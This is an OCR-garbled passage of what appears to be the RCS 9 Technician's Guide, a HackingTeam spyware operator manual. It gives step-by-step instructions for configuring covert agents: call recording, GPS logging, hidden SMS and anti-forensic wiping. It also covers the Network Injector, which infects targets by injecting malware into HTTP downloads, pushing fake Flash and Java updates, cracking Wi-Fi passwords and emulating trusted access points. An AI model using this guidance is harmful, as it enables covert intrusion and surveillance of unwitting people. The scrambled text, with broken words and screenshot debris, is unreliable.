7 Factory and agent: advanced configuration resentatio Introduction Advanced configuration lets vou set advanced configuration options. Other than enabling collectable evidence, events can be linked to actions, to trigger specific agent reactions to changing conditions in the Device screensaver is started}. Actions can start or stop modules and enable or disable other events. Furthermore, all the event, action and module options can be individuallv set. Content This section includes the following topics: What you should know about advanced configuration Advanced factory or agent con?guration ..59 Globalagent data 53 TechniciansGuide ver.1.5 - RES - b31352] - pag. 55

RC3 9 - What you should know about advanced con?guration What you should know about advanced configuration Advanced configuration Advanced factorylagent configuration lets you create complex activation sequences using a simple graphic interface. The purpose of the sequence is to evidence collection, and/'or run an action when an event occurs. Advanced configuration always includes two basic sequences: . At each (Loop event], acquire device information (Start module action Device module] At the end of the interval (Tim er-Loop event], run between the agent and RC5 action} Following is an image that illustrates the two basic sequences recommended for remote data acquisition331? [Jail-r. I. .'Inu'w-h' NOTE: these two basic sequences are set by default and recommended for minimum agent operations. Advanced configuration components Advanced configuration components are: Technician's Guide ver.1.5 RC8 9 20134323 - pag. 56

RC5 9 - Reading sequences 0 events that trigger an action a call is received on the device) in actions run when an event occurs start recording the call) 0 sub-octions run when an event occurs hidden 5M5 sent with device position) 0 moduies which, enabled by an action, start collecting the desired evidence or trigger other actions on the device record call audio) 0 sequences, used to indicate a group of events, actions, sub-actions and modules. NOTE: some events, action and module options are only available in advanced con?guration. Reading sequences Complex sequences can be read as follows: 0 When the device is connected to the power source 0 an SMS (sub-action) I: logging the position (action that triggers a module) the event occurring when the SIM is changed (action that disables an event) 0 so on Possible event, action, sub-action and module combinations are in?nite. Following is a detailed explanation of correct design rules. Events Events are monitored by the agent and can start, repeat or end an action. NOTE: a module cannot be directlv started by an event. For example, a Window event (window opened on the device) can trigger an action. The action will then a module. Various types of events are available. For the full list see "Event iist? on page 112 . The relation between an event and one or more actions is represented by a connector: Reiotion between events Description Connector ond' octions Start Start an actIon when the event occurs. I Repeat Repeat an actIon. The Interval and number of I repetitions can be specified. End Start an actIon when the event Is over. I Technician's Guide ver.1.5 RCSQ 2013 - pag. 57

RC5 9 - Actions 0 NOTE: an event can manage up to three distinct actions simultaneously. The Start action is started when an event occurs on the device event triggers Start when the device enters standby mode). The Repeat action is triggered at the set interval for the entire duration of the event. The Stop action is started when the event is over the Stanttir event triggers End when the device exits standby mode). Actions Actions are triggered when an event occurs. The; can: i start or stop a module . enable or disable an event 0 run a sub-action For example, an action (emptv) can disable the Process event (start a svstem process) that triggered it and enable the Position module (log the GPS position). If necessarv, the action can also run an SMS sub-action (send a message to a speci?ed phone num ber). ?v?arious sub-actions are available and can be combined without restrictions run a command create an Alert message). For the full listsee "List of sub-actions? on page 105 Relations between actions and modules An action can influence a module in different ways. The relation between an action and one or more modules is represented bv a connector: Reiotion between Description Connector actions and moduies Start modules Start a module. . Stop modules Stop a module. I An action can startistop several modules sim ultaneouslv. Relations between actions and events The relation between an action and one or more events is represented by a connector: Reiotion between Description Connector action and events Enable events Enable an event. I. Disable events Disable an event. I Technician's Guide ver.1.5 RCSQ 20136:) - pag. 58

RC5 9 - Modules NOTE: an action can enableldisable several events sim ultaneouslv. Modules Each module enables the collection of a specific evidence from the target device. The; can be startedfstopped bv an action and produce evidence. For exam pl e, a Position module (log the GPS position) can be started by an action triggered by a Call event (a call was madefreceived). ?v?arious modules are available that can be startedlstopped start position module stop screenshot module). For the complete listsee "Module list" on page 122 . Exporting and importing configuration settings Base or advanced con?guration settings are exportedfimported to reuse the settings on other RC5 systems. The base or advanced configuration settings are exported in a .json ?le that can be transferred to another svstem and imported when creating an agent. Saving the configuration settings as a template Base or advanced configurations settings are saved as a template to have other users on the same RCS svstem reuse the configuration. The base or advanced configuration settings are saved as a template in the database, accompanied by a description and the name of the user. When creating another target, another user can load it and thus it becomes the configuration for that agent. IMPORTANT: base and advanced configuration templates are saved separatelyr in the database. Base configuration templates thus appear when creating an agent with a base configuration, advanced configuration templates appear when creating an agent with an advanced configuration. Advanced factory or agent configuration To open oduonced'con- Operations section, double-click an operation, double-click a target, double-click a factory, figuration: click Advanced Config Operations section, double-click an operation, double-click a target, double-click an agent, click Advanced Config Purpose This function lets vou: . create module activation sequences triggered by events occurring on the target device. Each sequence can be made up of one or more sub-actions. . Set general factorvfagent configuration options. NOTE: the function is onlv enabled if the user has Agent configuration authorization. Technician's Guide ver.1.5 RC3 9 20133) - pag. 59

RC5 9 - Next steps I when returning from advanced configuration to basic configuration, the advanced configuration be iost and the aefauit basic configuration be restoreci. Next steps For a factory, after completing its configuration, compile it to obtain the agent to be installed.$ee a factory" on page 35 For an agent, after completing its configuration, simply save the new configuration. At the next the new configuration will he sent to the agent. What the function looks like This is what the page looks like: 5mm. .- nwlau II- ?Turf? I. x. Suit .1 boon El <9 1 p. ??i?hta? Area Description 1 RES menu. 2 Scroll bar. Yr. JPI ?res the-Ida's II: are: C9 C9 5' I ?JrWEE-- a p. ~11 in on.? Technician's Guide yer.1.5 Rcsa 2013s} - pag. 60

RC5 9 - What the function looks like Area Description 3 Window toolbar. Descriptions are provided below: icon Description 0? Compile the configuration into one or more agents, based on selected installation vectors. See "Compiling a factory? on page 35 Save the current configuration. Export the configuration to a .json file. Import the con?guration from a .json ?le. Load the advanced configuration template or save the current configuration as a template. See "What you should know about advanced configuration on page 56. 5353539 Add an event. Add an action. Edit the selected event or action. Delete the selected event, action or logical connection. Edit global agent data see "Global agent data? on page 63 . MUTION: settings are iost when you return to the basic configuration. Im- Shrink or expand event or action widgets to provide a better view of current settings. II II II- 4 Event area. STARTUP and SYNC events are bv default. 5 Action area. STARTUP and SYNC actions are enabled by default. 5 Modules area. Modules vary by desktop or mobile device. Technician's Guide ver.1.5 RCSQ 2013 - pag. 61

RC5 9 - To learn more Area Description 7 RC5 status bar. To learn more For interface element descriptions See "Shared interface elements and actions" on page 14 . For more information on the advanced configurationsee "What you should know about advanced configuration" on page 56. Creating a simple activation sequence To create a simple sequence, to collect evidence when an event occurs: Step Action 1 Creating an event: . Click Add Event: the event selection and settings window opens. . In Tvpe, select the tvpe of event and set options. See "Event list? on page 112 at Click Save: the new event is added to the work area 2 Creating an action: . Click Add Action: the empty action is added to the work area 3 Link the event to the action, then the action to the desired module: . Click on the Start event connection point, then drag the arrow to the action . Click on the Start Modules action connection point, then drag the arrow to the type of data to be acquired.$ee "Module list? on page 122 . 4 Click Save: the configuration is ready to be compiled (if factory) or transmitted to the device at the next (if agent). Creating a complex activation sequence To create a complex sequence, to start collecting evidence, run a sub-action and enablefdisahle an event, when an event occurs: Technician's Guide ver.1.5 RC3 9 201313} - pag. 62

RC5 9 - Global agent data Step Action Creating an event: 1- Click Add Event: the event selection and settings window opens. in In Tvpe, select the tvpe of event and set options. See "Event list? on page 112 1. Click Save: the new event is added to the work area Creating an action and setting sub-actions: 1- Click Add Action: the emptv action is added to the work area 1. Double-click on the action and add the sub-action in Subaction and set options. See "List of sub-actions" on page 105 . Connecting the event to the action: . Click on one of the Start, Repeat, End event connection points, then drag the arrow to the action Connecting the action to the module: 1. Click on the Start Modules Stop Modules action connection points, then drag the arrow to the module to be started or stopped. See "Module list? on page 122 . E: Tip: Drag multiple arrows if multiple modules have to be enabled. For an action that requires an event to be enabledldisabled: 1- Click on the Enable events or Disable events action connection points, then drag the arrow to the events to be enabledldisabled. Click Save: the configuration is ready to be compiled (if factoer or transmitted to the device at the next (if agent). Global agent data Global agent data is described below: Fieia' Description Minimum Minimum free disk space on the device. disk free Maximum Maximum space occupied by evidence on the target device, up to next evidence 1 GB by default. size When this limit is reached, the agent stops recording and waits for the next If does not occur, no further evidence is acquired. Technician's Guide ver.1.5 RC3 9 20133) - pag. 63

Fieid RC5 9 - Global agent data Description Wipe Remove driver No hide Mask If enabled, it wipes the files generated by the agent. No trace of the agent will be detected in case of forensic analysis. 0 NOTE: this method takes longer to complete than normal ?le deletion. Remove the driver at uninstall. Service call: only use when requested by HackingTeam support service. Service call: only use when requested by HackingTeam support service. Technician's Guide ver.1.5 RC8 9 20133:] - pag. 64

The Network Injector resentatio Introduction Network Injector allows you to tap the target's HTTP connections and inject an agent on the device. Content This section includes the following topics: What you should know about Network Injector and its rules Managing the Network Injector Injection rule data Checking Network Injector status What you should know about Appliance Control Center .. ApplianceControlCenter Appliance ControlCenter data What you should know about Tactical Control Center TacticalControlCenter TacticalControlCenterdata 55 3?5 T5 BO 34 .95 TechniciansGuide uer.1,5 - RES - b31352! - pag. 65

RC5 9 - What 1vou should know about Network Injector and its rules What you should know about Network Injector and its rules Introduction Network Injector monitors all the HTTP connections and, following the injection rules, identifies the target's connections and injects the agent into the connections, linking it to the resources the target is downloading from Internet. Network Injector types There are two Network Injector tvpes: . Appliance: network server for installation in an intra-switch segment at an Internet service provider. 0 Tactical: laptop for tactical installation on LAN or WiFi networks Both Network Injectors let you automaticallv identifv the target devices and infect them according to the set rules via their control software (Appliance Control Center or Tactical Control Center). Tactical Network Injectors also allow for manual identification. See "What you should know about Network Injector Appliance What you should know about Tactical Control Center" a paginaSI} . Types of resources that can be infected Resources that can be infected by RCS are anv type of files. NOTE: Network Injector is not able to monitor FTP or connections. How to create a rule To create a rule: 1. define the way to identifv the target's connections. For exam pl e, by matching the target's IP or MAC address. Dr let the Tactical Network Injector operator select the device. 2. define the wav to infect the target. For example, by replacing a file the target is downloading from the web or lav infecting a website the target usuallv visits. Automatic or manual identification rules If information is already known on target devices, numerous rules can be created, adapting them to the target's different habits, then enabling the most ef?cient rule or rules according to the situations that arise during a certain time in the investigation. If no information is known on target devices, use Tactical Network Injector which allows operators to observe the target, identifv the device used and infect it since on the field. For this type of manual control specifv TACTICAL in the User patterns ?eld in the injection rule. Technician's Guide ver.1.5 2013s} - pag. 66

RC5 9 - What happenswhen a rule is enabledfdisabled What happens when a rule is enabled/disabled Enabling a rule means making it available to the Network Injector injection process. RC5 routinely communicates with Network Injector to send rules and acquire logs. The operator is in charge of enabling this for Tactical Network Injector. A rule that is not enabled is not applicable meaning it cannot be sent to the Network Injector. Starting the infection After Network Injector receives the infection rules, it is ready to start an attack. During the sniffing phase, it checks whether any of the devices in the network meets the identi?cation rules. If so, it sends the agent to the identified device and infects it. Managing the Network Injector To :11 Image Ne twork II System cti on Network Injector infer: tors: Purpose When the RC5 is running, this function lets you create injection rules and send them to the Network Injector. NOTE: the function is only enabled if the user has Injector rules management authorization. What you can do With this function you can: I. create an agent injection rule on a target . send the rules to Network Injector What the function looks like This is what the page looks like: Technician's Guide 1tier.1.5 RC3 9 20133) - peg. 6?

sir-wu- 2 RC5 9 - What the function looks like Jz?cc- ric-r': ILII 4? 1! H: H. 2 Turn-I 1.4: - "er .le 4 El Area Description RC5 menu. System menu. Network Injector toolbar. Network Injector list. Injection rule toolbar. NOTE: the functions are only enabled if the user has Injector rules management authorization. Descriptions are provided below: Action Description (85531! Add a new rule. Open the window with rule data. Delete the selected rule. Send rules to the selected Network Injector. Appliance automatically updates at the next provided an infection process is running. While the operator must select whether the rules should be updated with Tactical. Technician's Guide yer.1.5 RCSQ 2013 - pag. 68

RC5 9 - To learn more Area Description 5 List of selected Network Injector rules En: select to enable the rules to be applied. 3 RES status bar. . To learn more For interface element descriptions See "snared interface elements and actions" a paginal4 . For a description of injection rule data see "injection ruie data? pagina successiva . For further information on injection rules see "What you should know about Network injector and its rules" a pagina?? . Adding a new injection rule To add a new rule: Step Action 1 Select the Network Injector for the new rule: rule commands and table appear. 2 I Click Add New Rule: data entry fields appear. I Enter the required data. If the rule is enabled, it can already be sent to the Network Injector. See "injection ruie data" pagina successiva . Click Save: the new rule appears in the main work area. Send the rules to Network Injector To send the rules to Network Injector: Step Action 1 Enable the rule to be sent to Network Injector bv selecting the En control box in the table. 2 Click rules: RES receives the request to send the rules to the selected Network Injector . The progress bar in the download area shows operation progress. NDTE: Network Injector onlvr receives the updated rules when is with the RES server. [See "Checking Network injector status or pagina74 Technician's Guide ver.1.5 RC3 9 20133 - pag. 69

RC5 9 - lnjec?on rule data Injection rule data Data that define the available infection rules are described below: Data Description Enabled If selected, the rule will be sent to the Network Injector. If not selected, the rule is saved but not sent. Disable on If selected, the rule is disabled after the first of the agent de?ned in the rule. Probability Ta rget If not selected, the Network Injector continues to apply the rule, even after the first Probability (in percent) of applying the rule after the first infected resource. after infecting the first resource, Network Injector will no longer apply this rule. 100%: after infecting the first resource, Network Injector will always apply this rule. E: Tip: if a value over 50% is selected, we recommend you use the Disable on Mini? option. Name of the target to be infected. Technician's Guide 1I.Ier.1.5 RC3 9 20131:) - pag. 7U

RCS 9 - lnjec?on rule data Data Description ldent Target's HTTP connection identi?cation method. NOTE: Network Injector cannot monitor FTP or connections. Each method is described below: Doro Description Static IP assigned to the target. IP Range of IP addresses assigned to the target. RANGE Target's static MAC address, both Ethernet and WiFi. MAC DHCP Target's network interface MAC address. ?gums- RADIUS user name. User-Name (RADIUS 802.11). LDGIN RADIUS caller ID. Calling-Station-Id (RADIUS 802.11). RADIUS session ID. Acct-Session-Id (RADIUS 302.11). SESSID RADIUS kev. NAS-IP-Address: Acct-Session-Id (RADIUS 802.111}. TECHKEY STRING- Text string to be identified in the data traffic from the target. CLIENT STRING Text string to be identified in the data traffic to the target. SERVER TACTICAL The target is not automaticallv identified but can be identified luv the operator on Tactical Network Injector. Only after the device is identified by the operator is the ldent field customized with the data received from the device. Technician's Guide ver.1.5 RCS 9 20133) - pag. 71

RES - Injection rule data Data Description User Target's traffic identification method. The format depends on the type ofldent pattern selected. Method Format DHCP Corresponding address "195.162.21.2"l. STATIC-IF STATIC-MAC STATIGRANGE Address range separated or; "195.162.21.2? 195,162,215?. STRING- Text string CLIENT STRING- SERVER RADIUS- ID or part of the ID. RADIUS-LUGIN Name or part of the user name. RADIUS- ID or part of the ID. SESSID RADIUS- Ker,?r or part of the key lie: TECHKEV TACTICAL A value cannot be set. The correct value will be set by the field operator. uer.1.5 RES 2CI13EI HT S.r.l. - pag. 7?2

RC5 9 - Injection rule data Data Description Resource Identification method of the resource to be injected, applied to the Web re source pattern URL. The format depends on the type of Action selected. NOTE: leaye empty if the selected action is Action type Resource Pattern Content INJECT- EXE INJECT- HTML- FILE INJE CT- HTML- FLASH INJECT- UPGRADE REPLACE URL of the executable file to be infected. Use wildcards to increase the num ber of matching URLs. Exam pl es of possible formats: NOTE: when a full path is specified, be careful of any mirrors used by websites to download files Tip: enter *.exe* to infect all executable files, regardless of the URL. I I - IMPORTANT: for example, if *exe? is entered without the file extension separator, all the pages that accidentally contain the letters "exe" will be injected. URL of the website to be infected. Exam pl es of possible formats: 5 NOTE: the site address must include the final character if an HTM or dynamic page is not specified 5 NOTE: a redirect page cannot be infected. Check the browser for the correct site path before using it in a rule. Preset for Youtube and read-only by the user. Not used. URL of a resource to be replaced. Technician's Guide yer.1.5 RC3 9 201313 - pag. 73

RCS 9 - Checking Network Injector status Data Description Action Infection method that will be applied to the resource indicated in Resource pattern: Method Function Infects the downloaded EXE file in real time. The agent is installed EKE when the target runs the EXE file. WEE-L Lets you add the HTML code provided in the file in the visited web HTML- Page- Please contact HackingTeam technicians for further details. INJECT- Blocks videos on voutube and requires the user to install a fake Flash HTML- update to view them. The agent is installed when the target installs FLASH the update. WEE-F Noti?es the Java Runtime Environment on the device that an update UPGRADE is available. The agent is installed when the target installs the update. Does not refer to Resource pattern. REPLACE Replaces the resource set in the Resource pattern with the supplied ?le. r: Tip: this type of action is very effective when used in combination with Exploit generated documents. Agent For all actions except REPLACE. Agent to be injected into the selected Web resource. File For REPLACE Action onlv. File to be replaced with the one indicated in Resource pattern. Checking Network Injector status Introduction Network Injector with the RC5 server to download updated control software versions, identi?cation and injection rules and send their logs. Network Injector status can be monitored from RC5 Console. Speci?callv: in the Monitor section: to identify when Network Injector is and thus available for data exchanges. Technician's Guide ver.1.5 RCSEI 20136:) - pag. 7?4

RC3 9 - Identifying when Network Injector is Identifying when Network Injector is The procedure is described below: Step Action 1 In the Monitor section, select the Network Injector object row to be analyzed. Check the Status column: if flagged green, the Network Injector is This situation occurs when on Control Center software (Appliance or Tactical]: . Config was clicked, the operator manually queued for new rules or updates; I. Start was clicked or an infection is in progress. IMPORTANT: applied rules and updates can only be received from RCS when Network Injector is What you should know about Appliance Control Center Introduction Appliance Control Center is an application installed on Network Injector Appliance. with RCS server Appliance Control Center with RCS to receive the updated infection rules and to check whether a new version of Appliance Control Center is available and send logs. can occur in two ways: I. manually, at least the first time, to receive injection rules, using the Appliance Control Center Network Injector function. 1- automatically with an infection in progress. During RCS communicates with Network Injector Appliance at set intervals of time (about 30 sec.j. Injection interface IP address For infection to be successful, the infection interface must have a public address, otherwise the target will never be able to see it. In an initial phase you can use the preset address on the interface with Appliance Control Center (with Public "auto"j, wait for a message that indicates that the address is private and, in that case, set a public address to re-route the private address (Public IP . Sniffing, on the other hand, can be run via the network interface with a private IP address. Technician's Guide ver.1.5 RC3 9 20134333 - pag. 75

RC3 9 -Appliance Control Center Appliance Control Center Purpose Appliance Control Center lets devices be infected: automatically, by applying the identi?cation rules based on known device information IP address) What you can do With Appliance Control Center you can: Enable with RCS server to receive updated identification and injection rules and send logs. Update Appliance Control Center, essentially to update agents on devices. Automatically identify connected devices and infect them through identification and injection rules. Password request When Appliance Control Center opens, a password must be entered, the same as the notebook on which it's running. What the function looks like This is what the page looks like: Appliance control enter [Coblu cl} 7 uL-wll: I an: RBI I L's-ll El Conf'g Rules Start 5n ff ng erl'd [Internal H'hFrnel: device} IP: I duLu I At [3 ma startup Technician's Guide ver.1.5 RC3 9 201313} - pag. 76

RC5 9 - To learn more Areor Description 1 Single application access tabs. Descriptions are provided below: Function Description Network It manages target device sniffing and infection, RC5 rules Injector and updates Appliance devices. Log Lists logs in real time. System 2 Area with the buttons to reload the device list, start network connections, enable enable automatic reboot after boot and enable Network Appliance update. To learn more To learn more about Appliance Control Center see "What you should know about Appliance Control Center" a pogino?5 . For a description of Appliance Control Center data see "Appliance Control Center data" a pogino?9 Enabling with RC5 server to receive new rules Following is the procedure on how to enable with RCS server to receive updated rules: NOTE: if an infection is in progress, Network Injector is already with RCS server and thus rules are automaticallv uploaded; skip to step 4.5ee "Checking Network injector stotus pogino?4 Technician's Guide ver.1.5 RC3 9 20133 - pag. 77

RCS 9 - Infecting targets using automatic identi?cation Steps Result 1. In the Network Injector tab, click Con?g: is enabled. 2. [luring RC5 queries Network Injector every 30 seconds. Sent injection ruleswill he received Injector in; Mel wol e1 Inc-e: 1' Rl?ll?hh gui?il-IuillLL-l r?np; lelln [Ir] l."l ll'i-ulml tit-with} 1' Console.5ee ?Managing the Network ?hum MD Star" a Fagin 56IMPORTANT: routiner enable to guarantee constant operating center updates and infection success. 3. To stop click Stop. 4. To yieyur the rules received from RC5 Console Network rules click Rules: all rules for Network Injector I2uln nnsnurrn appear testt?lenamplacom moti- 7" star-sic IF 23.0.1 13.20 50% IHJECT mom" 0 IMPORTANT: make sure rule is successful after requesting updated from RC5 Console. lnfecting targets using automatic identification To start automatic identification and infection: Technician's Guide yer.1.5 RC3 9 20133 - pag. 73

Steps RC3 9 - Viewing infection details Result 1. In the Network Injector tab, select the network interface for injection in the Network Interface list box. 2. In the Snif?ng interface list box, select a different network interface to be used for snif?ng or select the same interface used for injection. Tip: use two differentinterfaces to guarantee better device identi?cation. NOTE: Endace interfaces meaning snif?ng interfaces, appear in Snif?ng Interface. 3. Click on Automatic Startup to automatically restart the infection without any human intervention even after Appliance Network Injector reboot or shutdown. 4. Click Start. IMPORTANT: Appliance Control Center lets you set up, start an infection and close Appliance Control Center leaving the infection running. 'lhe next time it is opened with the infection runningJ the Stop button will appear instead of the Start button. 'lhis letsyou re-con?gure and start a new infection. 5. To stop infection, click Stop. or close the window to leave the infection running. Viewing infection details To view recorded data, select the Log System tab. Cantu-cl. Center Network Injector in; iIIl E?l lac-e: 1- Rt?ll?hh fa?; l'L-nlml duuitu} 1' P: IP: i kl Collf'u ElulL 3.. . - . Appllanee Control. Center Network Injector in; ?ysl mil Mel l: iIIl E?l lace: Ir.de 1' I denim} 1' P: IP: i ALlnInnliI: s.l collr'u Appliance Control Center data Network Injector data tab Data is described below: Technician's Guide ver.1.5 RC8 9 20134323 - pag. 79

RC5 9 - Whatyou dtould know aboutTac?cal Control Center Doto Description Network List of connected network interfaces. Select the injection interface connected to the interface network on which the device to be attacked is connected. Snif?ng Like Network Interface or another network interface to only be used for sniffing. interface NOTE: If the system includes an Endace DAG card for Gigabit connections, the card will be detected and displayed in this list. Public IP Lets you specify a public IP address to be mapped on the injection interface private IP address. If "auto" is entered, the system uses default IP address on the injection interface and send a message indicating that it is a private IP address. Automatic It automatically restarts the infection without any human interyention eyen Startup following Appliance Network Injector reboot or shutdown. IM PORTANT: If this option is not selected, infection will not be automatically started. What you should know about Tactical Control Center Introduction Tactical Control Center is an application installed on a notebook, called Tactical Network Injector. It can connect to a protected WiFi network, infect deyices thanks to RCS identification and injection rules or infect manually identified devices. The identification and infection rules are the same as those used for Network Injector Appliance, with the sole difference that Tactical Network Injector provides an additional "manual" identi?cation rule. Thus the operator identifies the device to be infected and applies the injection rules to that device. Tactical Control Center operations With Tactical Control Center you can: I. Enable with RC5 to receiye updated identi?cation and injection rules and send logs. in Update Tactical Control Center, essentially to update agents on devices. 1. Automatically identify devices in a wired or WiFi network and infect them according to the RC5 identification and injection rules. . Manually identify deyices in a wired or WiFi network and infect them according to the RC5 injection rules. The operator is in charge of identification. 1- Connect to a protected WiFi network to obtain its password. . Emulate a WiFi network Access Point normally used by the target. Technician's Guide yer.1.5 asp-2013 RCSQ 2013c} - pag. 80

RCS 9 - with RCS server NOTE: the injection network can be external or an open WiFi network simulated by the Tactical Control Center. with RCS server Tactical Control Center with RCS to receive the updated infection rules and to check whether a new version of Tactical Control Center Is available and send logs. can occur in two ways: I: manually, the first time to receive injection rules. It automatically with an infection in progress. Updating infection rules If traffic generated by the target cannot be infected with the current rules, request operator assistance on RCS Console to generate new rules and update Network Injector. Receive the new rules the next time Tactical Control Center Is to view them. Using network interfaces Two different network interfaces are available during an attack, one for snif?ng and one for injection. Using two separate interfaces is indicated to guarantee continuity, especially for sniffing. Only the snif?ng interface is used when emulating the Access Point and acquiring network passwords. Sniffing interfaces can be internal or external: external interfaces are indicated for sniffing because transmission speed Is higher. Infection via automatic identification The steps needed to infect devices automatically identified by RCS rules are described below. The attack can be run on wired or WIFI networks: Phase Description Where 1 Prepare identification and injection rules for known targets RC5 ConsoIe, System, to be attacked. Send the rules to Tactical Network Injector. Network Injector 2 Enable with RCS to receive updated rules. Tocticol Network Injector, Network Injector 3 If target devices are connected to a protected WIFI network, ToctIcoI Network acquire the password. Injector, WIreIess Intruder Technician's Guide ver.1.5 RC3 9 20133) - pag. 81

RC5 - Infection via manual identi?cation Phase Description Where 4 The system sniffs, traffic, identifies target devices thanks to Tam-m; Network identification rules and infects them thanks to injection rules. jnjECfor) Network injector 5 If necessary, force re?authentication on devices not Identified by the rules. Infection via manual identification Following are the steps required to infect manually identified devices. The operator's goal is to identify target devices. The attack can be run on wired or WiFi networks: Phase Description Where 1 Prepare identification rules that include manual identification and RC5 Console, injection rules for all the target devices to be attacked. Send the System, rules to Tactical Network Injector. Network injector 2 Enable with RC5 to receive updated rules. Tucticoi Network injector, Network injector 3 If target devices are connected to a protected WiFi network, Tucticoi acquire the password. Network injector, Wireiess intruder 4 If target devices can connect to an open WiFi network, try Tucticoi emulating an Access Point known by the target. Network injector,Foke Access Point 5 The system proposes all devices connected to the selected Tam-m; network interface. Use filters to search for target devices or Network check the web chronology for each device. Injector! Network injector 5 Selectdevices and Infect them. Enable with RC5 Tactical Control Center receives the updated software and identification and injection rules from RC5 and sends logs. In this communication, RC5 will attempt to communicate with Tactical Network Injector at set intervals {about 30 sec.}. In Tactical Control Center, decide when to enable using the Network Injector function. ver.1.5 2CI13EI - pag. 82

RCS 9 - Protected WiFi network password acquisition Protected WiFi network password acquisition If the target device is connected to a protected WiFi network, the access password must be obtained to login. The Wireless intruder function lets you connect to a WiFi network and crack the password. For WPA and WPA 2 protected networks, an additional dictionary can be loaded in addition to the standard dictionary. The password is displayed and the operator can copy it to use it with the sniffing and injection function (Network Injector function]. Infection via automatic identification This work mode is suited for situations when some target device information is known IP address). In this case, RCS injection rules include all the data required to automatically identify target devices. Starting automatic identi?cation using the Network Injector function gradually displays target devices that are immediately infected by the injection rules. Forcing unknown device authentication You may not be able to connect to some devices in a password protected WiFi network. These types of devices appear in the list as unknown. In this case, their authentication can be forced: the device will disconnect from the network, reconnect and be identi?ed. Infection via manual identification Manual identi?cation can be indicated in RC5 identification rules. This procedure is frequently run when there is no information on the device to be infected and it must be identified on the ?eld. In this case, a series of functions to select devices connected to the network is available to the operator: filters can be set on tapped traffic: only devices that meet this criteria are infected. at each device chronology can be checked to decide which device should be infected. Once target devices are identified, simply select them to start infection; the identi?cation rules are "customized" with the device data to allow injection rules to be applied. NOTE: devices that were already infected via automatic identification can be manually infected. Setting filters on tapped traffic When manually identifying targets, some targets may not be identified among those connected to the network. In this case, use the Network Injector function to set filters on tapped traffic. Tactical Control Center provides to types of ?lters: Technician's Guide ver.1.5 RC3 9 201333 - pag. 83

RC5 9 - Filter with regular expression 1. regular expressions 1- Network BPF (Berkeley Packet Filter) Filter with regular expression Regular expressions are broad filters. For example, if our target is visiting a Facebook page and talking about windsurf, simply enter "facebook" or "windsurf". Tactical Network Injector taps all traffic data and searches for the entered words. For further information on all admitted regular expressions, see expression. BPF {Berkeley Packet Filter) network filter This is used to more accurately filter devices using BPF syntax (Berkeley Packet Filter]. This syntax includes key words accompanied by qualifiers: 1- type qualifiers host, net, port), indicate the type of object searched for 1- direction qualifiers src, indicate the direction of the data searched for 1. protocol qualifiers ether, wlan, ip) indicate the protocol used by the object searched for For example, if our target is visiting a Facebook page, enter "host facebook.com" For further details on syntax qualifiers, see Identifying a target by analyzing the chronology Another way to filter and shorten the list of possible targets is to analyze deyice web traffic to identify it as the target. Emulating an Access Point known by the target In certain scenarios target deyices must be attracted to tap their data, indentify and infect them. To do this, Tactical Network Injector emulates an Access Point already known to the target device. This way, if the device is enabled to automatically connect to available WiFi networks, it automatically connects to the Access Point emulated by Tactical Network Injector as soon as it enters the WiFi area. . Tactical Control Center Purpose Tactical Control Center lets you identify and infest devices: I: automatically, by applying the identification rules based on known deyice information IP address) Technician's Guide 1yer.1.5 RC3 9 20133) - pag. 84

RC5 9 - Whatyou can do I. manually, through a series of attempts to identify the target device and infect it. The identification method should be agreed with the operating center. What you can do With Tactical Control Center you can: 0 Enable with RCS to receive updated identi?cation and injection rules and send logs. 0 Updating Tactical Control Center 0 Connect to a protected WiFi network to obtain its password. I: Apply deyice identification rules and infect them 0 Force new authentication on devices not identified upon the first attempt in Select devices based on filters or chronological information Emulate an Access Point to attract target deyices Password request When Tactical Control Center opens, a password must be entered, the same as the notebook on which it's running. What the function looks like This is what the page looks like: Tactical Control Center WilL'lI.? n- Lou hiyaLcrI th'exorlc Lowlf?st} 7 Signal: 1:035 E illi E wlam [External 9.01.11 '.ull'l Slgnal: 52% Llnl: test .1: .. .: r- ?aw-Hr" Inn-I: I Arr-Lu El 'l ll Technician's Guide yer.1.5 RCSQ 2013 - pag. 35

RC5 9 - To learn more Area Description 1 Single application access tabs. Descriptions are provided below: Function Description Network It manages target device sniffing and infection, RC5 rules, Injector updates Tactical devices and displays current Tactical Network Injector rules. Wireless Enters a protected WiFi network by identifying the password. Intruder Fake Emulates an Access Point. Access Point Log Lists logs in real time. System 2 Area with buttons to reload the device list, start network connections and enable 3 Filters to filter internet traffic on devices. 4 Device list area. To learn more For a description of Tactical Control Center data see "Tactical Control Center data" a pagina?? . To learn more about Tactical Control Center see "What you should know about Tactical Control Center" a paginaSU . Enabling with RC5 server to receive new rules Following is the procedure on how to enable with RCS to receive updated rules: NOTE: if an infection is in progress, Network Injector is already with RC5 server and thus rules are automatically uploaded; skip to step 4.5ee "Checking Network injector status a pagina?4 Technician's Guide ver.1.5 asp-2013 acsa 2013c} - pag. 86

RC5 9 - Running a network test Steps Result 1. In the Network Injector tab, click Con?g: is enabled. . 2. During RC5 queries ?M?i'r'm wi'mhuudm Hie-'me mew-n Network Injector every:r 30 seconds. Sent injection ruleswill be received at the end of mm? the lineman? In? t'hdilirs'l'oi Stop tide: Eldl'. 0 "J'I'lr-li- :5 rttn?: received if sent from RCS Console.$ee ?Man aging the Network injector? opogino?? 0 IMPORTANT: routiner enable to guarantee constant operating center updates and infection SUCCESS. run If all 3. To stop click Stop. 4. To view the rules received from RCS Console - click Rules: all rules for Network Injector iRum Ipmbab'l'w mm TACHCAL appear 1mm INJECT-I-TML-FLASII lM make sure rule Tm;ij 10.3.35 5.;ch is successful after requesting updated from RC5 Console. Running a network test The network test procedure for sniffing andfor injection is provided below: Technician's Guide ver.1.5 RC3 9 20133 - peg. 37

